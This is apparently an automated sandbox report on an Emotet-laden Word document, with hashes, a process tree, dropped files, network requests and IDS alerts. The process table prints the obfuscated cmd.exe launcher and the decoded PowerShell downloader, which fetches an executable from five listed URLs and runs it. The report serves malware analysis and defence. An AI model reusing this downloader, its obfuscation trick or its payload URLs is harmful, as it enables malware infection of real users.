File name: | FA02313_27.doc |
Full analysis: | https://app.any.run/tasks/512e5be1-8324-4b12-8a67-16f89f538104 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 17, 2019, 13:42:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 17:20:00 2019, Last Saved Time/Date: Tue Jan 15 17:20:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0 |
MD5: | DCDDC2D623FD5E0253BD2DAD75B18552 |
SHA1: | F870E722B7449EFC09E1C50998289A758A1C15C5 |
SHA256: | D1C556CEA58EBA409760BE05FD393A8397DC55C791843069B26E40A4B6495908 |
SSDEEP: | 3072:YM8GhDS0o9zTGOZD6EbzCdJellgmQ+1GkbaTL:YSoUOZDlbeJuCG1Gf |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:01:15 17:20:00 |
ModifyDate: | 2019:01:15 17:20:00 |
Pages: | 1 |
Words: | - |
Characters: | 3 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 3 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2848 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA02313_27.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2156 | "C:\Windows\system32\cmd.exe" /c %PRoGraMDAta:~0,1%%proGrAMdAtA:~9,2% /v: /R "Set FvT=p)0`PUBLIC:~5,1`r`SESSIONNATIE:~-4,1`h`TETIP:~-3,1`ll_#Superv5Bs)r^%q?'S)fZNja';#calculaZN5Bngcl?ne0-)bjecZN_NeZN.WebCl5BenZN;#05BZNhzra0aln)?'hZNZNp://000.al-bay.c)^%/[bDEG 6@hZNZNp://sZNarb5Bl5Bs5B^%.neZN/u^%EgLOOKUD@hZNZNp://000.^%)sgasclub.ru/sG)j[E5BH@hZNZNp://000.veenhu5Bs.ru/X4h2lgZNb6ZN@hZNZNp://000.ase^%an-c).c)^%/45B^%BAvqS'.Spl5BZN('@'$;#Eur)peanUn5BZN)fAcc)unZN9EUA9qh?'Oklah)^%as5B';#Sh)esZNZN_?_'144';#zep)s5BZN0q?'c)nnecZNjf';#EXEZNj?#env:publ5Bc+'\'+#Sh)esZNZN+'.exe';f)reach(#D5BrecZNq5B_5Bn_#05BZNhzra0aln)${ZNry{#calculaZN5Bngcl.D)0nl)azF5Ble(#D5BrecZNq5B,_#EXEZNj$;#C)c)sKeel5BngIslanzs0ZN?'D)0ns5Bqez5Bz';If_((GeZN-IZNe^%_#EXEZNj$.lengZNh_-ge_8]]]]$_{Inv)ke-IZNe^%_#EXEZNj;#Ca^%br5Bzgesh5Brej5B?'^%5Bcr)ch5Bpcs';break;}}caZNch{}}#Check5BngAcc)unZNrl?'EsZNaZNes^%';&& SeT Aq=!FvT:TI=M!& Set pIN=!Aq:ZN=t!&& Set 2YZg=!pIN:%=m!&&set bi5h=!2YZg:5B=i!& SET xS=!bi5h: =7!&set SYZ=!xS:0=w!&& seT s1A=!SYZ:?==!&&sET Il=!s1A:`=%!& seT Su=!Il:_= !& SET 0JM=!Su:)=o!& SET oghx=!0JM:z=d!&&SeT Nrm=!oghx:]=0!&&SEt SL=!Nrm:[=J!&& SEt 7oLW=!SL:$=)!& seT xj6=!7oLW:#=$!&& SEt 70=!xj6:q=z!&& eCHO %70% | cmD" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2760 | CmD /v: /R "Set FvT=p)0`PUBLIC:~5,1`r`SESSIONNATIE:~-4,1`h`TETIP:~-3,1`ll_#Superv5Bs)r^%q?'S)fZNja';#calculaZN5Bngcl?ne0-)bjecZN_NeZN.WebCl5BenZN;#05BZNhzra0aln)?'hZNZNp://000.al-bay.c)^%/[bDEG 6@hZNZNp://sZNarb5Bl5Bs5B^%.neZN/u^%EgLOOKUD@hZNZNp://000.^%)sgasclub.ru/sG)j[E5BH@hZNZNp://000.veenhu5Bs.ru/X4h2lgZNb6ZN@hZNZNp://000.ase^%an-c).c)^%/45B^%BAvqS'.Spl5BZN('@'$;#Eur)peanUn5BZN)fAcc)unZN9EUA9qh?'Oklah)^%as5B';#Sh)esZNZN_?_'144';#zep)s5BZN0q?'c)nnecZNjf';#EXEZNj?#env:publ5Bc+'\'+#Sh)esZNZN+'.exe';f)reach(#D5BrecZNq5B_5Bn_#05BZNhzra0aln)${ZNry{#calculaZN5Bngcl.D)0nl)azF5Ble(#D5BrecZNq5B,_#EXEZNj$;#C)c)sKeel5BngIslanzs0ZN?'D)0ns5Bqez5Bz';If_((GeZN-IZNe^%_#EXEZNj$.lengZNh_-ge_8]]]]$_{Inv)ke-IZNe^%_#EXEZNj;#Ca^%br5Bzgesh5Brej5B?'^%5Bcr)ch5Bpcs';break;}}caZNch{}}#Check5BngAcc)unZNrl?'EsZNaZNes^%';&& SeT Aq=!FvT:TI=M!& Set pIN=!Aq:ZN=t!&& Set 2YZg=!pIN:%=m!&&set bi5h=!2YZg:5B=i!& SET xS=!bi5h: =7!&set SYZ=!xS:0=w!&& seT s1A=!SYZ:?==!&&sET Il=!s1A:`=%!& seT Su=!Il:_= !& SET 0JM=!Su:)=o!& SET oghx=!0JM:z=d!&&SeT Nrm=!oghx:]=0!&&SEt SL=!Nrm:[=J!&& SEt 7oLW=!SL:$=)!& seT xj6=!7oLW:#=$!&& SEt 70=!xj6:q=z!&& eCHO %70% | cmD" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3028 | C:\Windows\system32\cmd.exe /S /D /c" eCHO %70% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3116 | cmD | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3600 | powershell $Supervisormz='Softja';$calculatingcl=new-object Net.WebClient;$withdrawalno='http://www.al-bay.com/JbDEG76@http://starbilisim.net/umEgLOOKUD@http://www.mosgasclub.ru/sGojJEiH@http://www.veenhuis.ru/X4h2lgtb6t@http://www.aseman-co.com/4imBAvzS'.Split('@');$EuropeanUnitofAccount9EUA9zh='Oklahomasi';$Shoestt = '144';$depositwz='connectjf';$EXEtj=$env:public+'\'+$Shoestt+'.exe';foreach($Directzi in $withdrawalno){try{$calculatingcl.DownloadFile($Directzi, $EXEtj);$CocosKeelingIslandswt='Downsizedid';If ((Get-Item $EXEtj).length -ge 80000) {Invoke-Item $EXEtj;$Cambridgeshireji='microchipcs';break;}}catch{}}$CheckingAccountrl='Estatesm'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2296 | "C:\Users\Public\144.exe" | C:\Users\Public\144.exe | — | powershell.exe |
User: admin Company: Microsoft Corpor Integrity Level: MEDIUM Exit code: 0 Version: 6.1.760 | ||||
3524 | "C:\Users\Public\144.exe" | C:\Users\Public\144.exe | 144.exe | |
User: admin Company: Microsoft Corpor Integrity Level: MEDIUM Exit code: 0 Version: 6.1.760 | ||||
3636 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | 144.exe |
User: admin Company: Microsoft Corpor Integrity Level: MEDIUM Exit code: 0 Version: 6.1.760 | ||||
3916 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Company: Microsoft Corpor Integrity Level: MEDIUM Version: 6.1.760 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9159.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F12DE22E.wmf | — | |
MD5:— | SHA256:— | |||
2848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50BC3E6C.wmf | — | |
MD5:— | SHA256:— | |||
3600 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NI4GFPXS3IWQYSC5RCY8.temp | — | |
MD5:— | SHA256:— | |||
3600 | powershell.exe | C:\Users\Public\144.exe | — | |
MD5:— | SHA256:— | |||
2848 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:E38C46694F93F7B7521B835043B365A5 | SHA256:80AFEF6DBF00D7FBBFE3A67DB00E4F9E36A0D1161385E0E185863FC6F10CEB00 | |||
3600 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3524 | 144.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:79B8983099201E6075F1606D71BB0267 | SHA256:0C516D67A29A48E621675CB943472571E23DE620B78C269B59C7C0A9E29262BD | |||
2848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DF0D057.wmf | wmf | |
MD5:A17CFF6851503B10ADC0FF8B4697B954 | SHA256:FA172E09279B565FA7F89384850964F3747E327CF75EBA0561F6877E22A278FF | |||
3600 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a0e9.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3600 | powershell.exe | GET | 301 | 159.253.42.200:80 | http://starbilisim.net/umEgLOOKUD | TR | html | 242 b | malicious |
3600 | powershell.exe | GET | 200 | 159.253.42.200:80 | http://starbilisim.net/umEgLOOKUD/ | TR | executable | 156 Kb | malicious |
3600 | powershell.exe | GET | 302 | 149.255.58.108:80 | http://www.al-bay.com/JbDEG76 | GB | html | 231 b | malicious |
3916 | wabmetagen.exe | GET | 200 | 187.163.177.194:22 | http://187.163.177.194:22/ | MX | binary | 132 b | malicious |
3600 | powershell.exe | GET | 200 | 149.255.58.108:80 | http://www.al-bay.com/cgi-sys/suspendedpage.cgi | GB | html | 7.40 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3600 | powershell.exe | 159.253.42.200:80 | starbilisim.net | Netinternet Bilisim Teknolojileri AS | TR | malicious |
3916 | wabmetagen.exe | 187.163.177.194:22 | — | Axtel, S.A.B. de C.V. | MX | malicious |
3600 | powershell.exe | 149.255.58.108:80 | www.al-bay.com | Awareness Software Limited | GB | malicious |
Domain | IP | Reputation |
---|---|---|
www.al-bay.com |
| malicious |
starbilisim.net |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3600 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3600 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3600 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |
3600 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3600 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3600 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3600 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3600 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3916 | wabmetagen.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3916 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |